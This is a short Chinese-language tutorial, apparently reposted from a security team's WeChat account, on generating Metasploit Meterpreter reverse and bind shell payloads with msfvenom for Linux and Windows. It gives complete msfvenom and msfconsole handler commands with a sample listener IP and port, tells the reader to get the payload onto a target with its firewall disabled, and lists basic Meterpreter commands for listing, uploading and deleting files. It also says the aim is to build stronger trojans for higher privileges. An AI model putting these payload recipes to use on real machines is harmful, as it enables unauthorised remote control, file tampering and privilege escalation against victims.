引
言
kali linux中meterpreter使用前的反弹shell及其基础语法
一.反弹shell的类型:
1.reverse_tcp (基于TCP反向链接反弹shell)
1).在kali linux终端中,生成一个反弹shell
linux版:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=你kali本机的IP lport=随便选一个端口来接收信息 -f elf -o shell如:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.168.240.119 lport=4444 --f elf -o shell
windows版:
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.168.240.119 lport=4444 -f exe -o shell.exemsfvenom -p windows/meterpreter/reverse_tcp lhost=172.168.240.119 lport=4444 -f raw -o shell.exe
2).生成shell后,将shell上传到相对应的靶机中,例如,linux版的上传到linux系统里,windows上传到windows系统中
前提是,靶机里的防火墙都要关闭,否则会被灭杀
3).在kali linux终端进入msfconsole界面
即运行以下命令:
msfconsoleuse expolit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 172.168.240.119set lport 4444show optionsexploit
4).返回windows中,点击运行shell,kali终端就会在4444端口连接到windows的meterpreter,记下来就进入到meterpreter命令行内,简单的一次shell反弹就成功了
2. bind_tcp (基于TCP正向连接的shell,适合在内网中使用,不用设置LHOST)
linux:
msfvenom -p linux/x86/meterpreter/bind_tcp lport=4444 -f elf -o shellmsfconsoleuse exploit/multi/handlerset payload linux/x86/meterpreter/bind_tcpset lport 4444exploit再打开一个终端进入到shell所在的目录ls给shell一个运行的权限chmod +x shellls=成功找到shell,点击运行,在msfconsole里可以看到握手成功,直接进入到meterpreter命令内
windows:
msfvenom -p windows/meterpreter/bind_tcp lport=4444 -f exe -o shell.exe3.reverse_http ( 基于http方式的反向连接,在网速慢的情况下不稳定)
windows:
msfvenom -p windows/meterpreter/reverse_http lport=4444 -f exe -o shell.exe4.reverse_https (基于https方式的反向连接,在网速慢的情况下不稳定, https如果反弹没有收到数据,可以将监听端口换成443试试)
windows:
msfvenom -p windows/meterpreter/reverse_https lport=4444 -f exe -o shell.exemsfvenom的反弹shell进入到靶机里,最主要的不是对其电脑进行简单的操作,而是生成更高级的木马,来获取靶机更高级的权限
meterpreter中的一些操作(即将shell上传到本虚拟机里):
1.查看目录
ls查看其他目录,并监听
ls /root/Documents2.文件上传
将桌面的文件上传到文档里
upload /root/Desktop/a.txt /root/Documents/3.删除文件
rm /root/Document/a.txt原文始发于微信公众号(Rot5pider安全团队):kali linux中meterpreter使用前的反弹shell及其基础语法
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论